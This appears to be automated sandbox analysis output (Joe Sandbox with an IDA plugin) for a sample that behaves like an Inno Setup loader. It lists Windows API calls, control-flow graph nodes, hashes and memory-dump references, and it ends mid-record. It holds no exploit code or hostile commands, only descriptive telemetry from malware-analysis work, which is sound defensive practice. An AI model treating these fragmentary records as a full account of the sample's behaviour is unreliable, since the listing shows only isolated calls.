                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: InfoLocale
                                                            • String ID:
                                                            • API String ID: 2299586839-0
                                                            • Opcode ID: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                            • Instruction ID: f5e54e9283223dc3068d295e9d46a059fb55c29f9ef527c49189185961fa2cd4
                                                            • Opcode Fuzzy Hash: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                            • Instruction Fuzzy Hash: 42E0927170021426D710A9A99C86AEB735CEB58310F4002BFB908E73C6EDB49E844AEE

                                                            Control-flow Graph

                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,00409C60), ref: 00404582
                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                            • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                            • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                            • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00409C60), ref: 004045C6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$HandleModulePolicyProcess
                                                            • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                            • API String ID: 3256987805-3653653586
                                                            • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                            • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                            • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                            • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

                                                            Control-flow Graph

                                                            APIs
                                                            • SetLastError.KERNEL32 ref: 0040A0F4
                                                              • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,020B15A0), ref: 0040966C
                                                            • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                            • SetWindowLongA.USER32(000103F8,000000FC,00409918), ref: 0040A148
                                                            • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                            • 73EA5CF0.USER32(000103F8,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastWindow$CreateDirectoryLongRemove
                                                            • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                            • API String ID: 3341979996-3001827809
                                                            • Opcode ID: 1a4f1778be80c46942aa9f98cae2169e0a6230f8324263ff29803b7c5577a5a1
                                                            • Instruction ID: a1ec2b29f79e5ff862fc4fad7e4f310b8339f10a1453332cc6b7faa73b6a426b
                                                            • Opcode Fuzzy Hash: 1a4f1778be80c46942aa9f98cae2169e0a6230f8324263ff29803b7c5577a5a1
                                                            • Instruction Fuzzy Hash: C2411F71600205DFD710EBA9EE8AB9977A4EB45304F10467EF514B73E2CBB8A811CB9D

                                                            Control-flow Graph

                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090C4
                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090DE
                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                            • API String ID: 1646373207-2130885113
                                                            • Opcode ID: acfb4439f313785c2c2b120c37d6defef782ad7ac64c67e7eba3e924cf2abd75
                                                            • Instruction ID: 4a4222b704d734fa8d0781b40c04fe9f9c76e7b4f133337d95099c0c8a01123f
                                                            • Opcode Fuzzy Hash: acfb4439f313785c2c2b120c37d6defef782ad7ac64c67e7eba3e924cf2abd75
                                                            • Instruction Fuzzy Hash: 20017170748342AEFB00BB72DD4AB163A68E785704F50457BF5407A2D3DABD4C04DA6D

                                                            Control-flow Graph

                                                            APIs
                                                            • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                            • SetWindowLongA.USER32(000103F8,000000FC,00409918), ref: 0040A148
                                                              • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040A1B9,?), ref: 00406B94
                                                              • Part of subcall function 004099A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,020B15A0,00409A90,00000000,00409A77), ref: 00409A14
                                                              • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,020B15A0,00409A90,00000000), ref: 00409A28
                                                              • Part of subcall function 004099A4: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                              • Part of subcall function 004099A4: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                              • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,020B15A0,00409A90), ref: 00409A5C
                                                            • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                            • 73EA5CF0.USER32(000103F8,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryExitLineLongMultipleObjectsRemoveWait
                                                            • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                            • API String ID: 978128352-3001827809
                                                            • Opcode ID: abb3e52ba2d34a87c951cbeec188d4c3ff7361d17d45cb79fe2b458f8c7fb345
                                                            • Instruction ID: f39d198f6ca78f9e57da3cbf677d536b45cc778db879de651171db1d1b5627bc
                                                            • Opcode Fuzzy Hash: abb3e52ba2d34a87c951cbeec188d4c3ff7361d17d45cb79fe2b458f8c7fb345
                                                            • Instruction Fuzzy Hash: 07411A71604204DFD714EBA9EE86B5A77A4EB49304F10427EE514B73E1CBB8A810CB9D

                                                            Control-flow Graph

                                                            APIs
                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,020B15A0,00409A90,00000000,00409A77), ref: 00409A14
                                                            • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,020B15A0,00409A90,00000000), ref: 00409A28
                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                            • GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                            • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,020B15A0,00409A90), ref: 00409A5C
                                                              • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,020B15A0), ref: 0040966C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                            • String ID: D
                                                            • API String ID: 3356880605-2746444292
                                                            • Opcode ID: ad223a4d496df5c95c16f58257358154d13b00c0811500baad5b3d8f4e498b4c
                                                            • Instruction ID: 6ea97129cf5aa135a7f7046e3a99eae43c862e8aca722617c6144c18eae127a8
                                                            • Opcode Fuzzy Hash: ad223a4d496df5c95c16f58257358154d13b00c0811500baad5b3d8f4e498b4c
                                                            • Instruction Fuzzy Hash: 3A1142B17442486EDB10EBE68C42FAEB7ACEF49714F50017BB604F72C2DA785D048A69

                                                            Control-flow Graph

                                                            APIs
                                                            • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID: .tmp$y@
                                                            • API String ID: 2030045667-2396523267
                                                            • Opcode ID: 68ca499064e88ad8d4bc1f4a2fd3397b1c963b2c890da41c2fdfea5cc663c78d
                                                            • Instruction ID: eba11cc0b212557bcf85e4c41764595d0d3f2f842990b0293eb01d0c1562b25b
                                                            • Opcode Fuzzy Hash: 68ca499064e88ad8d4bc1f4a2fd3397b1c963b2c890da41c2fdfea5cc663c78d
                                                            • Instruction Fuzzy Hash: 9841BD30600200DFC711EF25DE96A5A77A5EB49304B50463AF804B73E2CBB9AC05CBED

                                                            Control-flow Graph

                                                            APIs
                                                            • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID: .tmp$y@
                                                            • API String ID: 2030045667-2396523267
                                                            • Opcode ID: b92571b7798fdf1738320cf5764acc74050170256781880fb7a821db28d3127f
                                                            • Instruction ID: fef9de22095f7e51d457e3baefdda2d393bbfb66a144e2f6f14d312cbfdc2d61
                                                            • Opcode Fuzzy Hash: b92571b7798fdf1738320cf5764acc74050170256781880fb7a821db28d3127f
                                                            • Instruction Fuzzy Hash: 3A418D70610204DFC711EF25DED6A5A77A5EB49308B50463AF804B73E2CBB9AC05CBAD

                                                            Control-flow Graph

                                                            APIs
                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                            • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectoryErrorLast
                                                            • String ID: .tmp
                                                            • API String ID: 1375471231-2986845003
                                                            • Opcode ID: 8228534b5fce36e17f8a1a4f12b5018fbfc2097e6833105d4f39ac42e8c6f43b
                                                            • Instruction ID: a1094b0e4056d8a2da25745c6e48f9a4b2523a9a3c4edc503687ab74cbc79d39
                                                            • Opcode Fuzzy Hash: 8228534b5fce36e17f8a1a4f12b5018fbfc2097e6833105d4f39ac42e8c6f43b
                                                            • Instruction Fuzzy Hash: 3A213674A002099BDB05FFA1C9429DEB7B9EF48304F50457BE901B73C2DA7C9E059AA5

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 321 407749-40774a 322 4076dc-4076e6 WriteFile 321->322 323 40774c-40776f 321->323 325 4076e8-4076ea call 40748c 322->325 326 4076ef-4076f2 322->326 324 407770-407785 323->324 327 407787 324->327 328 4077f9 324->328 325->326 330 407700-407704 326->330 331 4076f4-4076fb call 4073ec 326->331 332 40778a-40778f 327->332 333 4077fd-407802 327->333 334 40783b-40783d 328->334 335 4077fb 328->335 331->330 339 407803-407819 332->339 341 407791-407792 332->341 333->339 337 407841-407843 334->337 335->333 340 40785b-40785c 337->340 339->340 349 40781b 339->349 342 4078d6-4078eb call 407890 InterlockedExchange 340->342 343 40785e-40788c 340->343 344 407724-407741 341->344 345 407794-4077b4 341->345 366 407912-407917 342->366 367 4078ed-407910 342->367 359 407820-407823 343->359 360 407890-407893 343->360 348 4077b5 344->348 351 407743 344->351 345->348 353 4077b6-4077b7 348->353 354 4077f7-4077f8 348->354 355 40781e-40781f 349->355 357 407746-407747 351->357 358 4077b9 351->358 353->358 354->328 355->359 357->321 361 4077bb-4077cd 357->361 358->361 363 407898 359->363 364 407824 359->364 360->363 361->337 365 4077cf-4077d4 361->365 368 40789a 363->368 364->368 369 407825 364->369 365->334 374 4077d6-4077de 365->374 367->366 367->367 371 40789f 368->371 372 407896-407897 369->372 373 407826-40782d 369->373 375 4078a1 371->375 372->363 373->375 376 40782f 373->376 374->324 384 4077e0 374->384 378 4078a3 375->378 379 4078ac 375->379 380 407832-407833 376->380 381 4078a5-4078aa 376->381 378->381 383 4078ae-4078af 379->383 380->334 380->355 381->383 383->371 385 4078b1-4078bd 383->385 384->354 385->363 386 4078bf-4078c0 385->386
                                                            APIs
                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: FileWrite
                                                            • String ID:
                                                            • API String ID: 3934441357-0
                                                            • Opcode ID: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                            • Instruction ID: ef7112967ca92329f6454244f41010afd6781152a6d2bd16d4b387d8db15cd6b
                                                            • Opcode Fuzzy Hash: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                            • Instruction Fuzzy Hash: F951D12294D2910FC7126B7849685A53FE0FE5331532E92FBC5C1AB1A3D27CA847D35B

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 387 406fa0-406ff3 SetErrorMode call 403414 LoadLibraryA
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                            • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ErrorLibraryLoadMode
                                                            • String ID:
                                                            • API String ID: 2987862817-0
                                                            • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                            • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                            • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                            • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 397 40766c-407691 SetFilePointer 398 4076a3-4076a8 397->398 399 407693-40769a GetLastError 397->399 399->398 400 40769c-40769e call 40748c 399->400 400->398
                                                            APIs
                                                            • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                            • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                              • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020A03AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$FilePointer
                                                            • String ID:
                                                            • API String ID: 1156039329-0
                                                            • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                            • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                            • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                            • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 391 40762c-40764a ReadFile 392 407663-40766a 391->392 393 40764c-407650 391->393 394 407652-40765a GetLastError 393->394 395 40765c-40765e call 40748c 393->395 394->392 394->395 395->392
                                                            APIs
                                                            • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                            • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastRead
                                                            • String ID:
                                                            • API String ID: 1948546556-0
                                                            • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                            • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                            • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                            • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 402 4075c4-4075e5 SetFilePointer 403 4075f7-4075f9 402->403 404 4075e7-4075ee GetLastError 402->404 404->403 405 4075f0-4075f2 call 40748c 404->405 405->403
                                                            APIs
                                                            • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                            • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                              • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020A03AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$FilePointer
                                                            • String ID:
                                                            • API String ID: 1156039329-0
                                                            • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                            • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                            • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                            • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                            APIs
                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Virtual$AllocFree
                                                            • String ID:
                                                            • API String ID: 2087232378-0
                                                            • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                            • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                            • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                            • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                            APIs
                                                            • GetSystemDefaultLCID.KERNEL32(00000000,004053A6), ref: 0040528F
                                                              • Part of subcall function 00404CCC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CE9
                                                              • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: DefaultInfoLoadLocaleStringSystem
                                                            • String ID:
                                                            • API String ID: 1658689577-0
                                                            • Opcode ID: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                            • Instruction ID: 2407abf821673f044c2d0b48b7a4a38d2d1f2757cafa01d062fe92b1f2c090cc
                                                            • Opcode Fuzzy Hash: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                            • Instruction Fuzzy Hash: 73314D75E0010AABCB00DF95C8C19EEB379FF84304F158977E815BB285E739AE059B98
                                                            APIs
                                                            • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                            • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
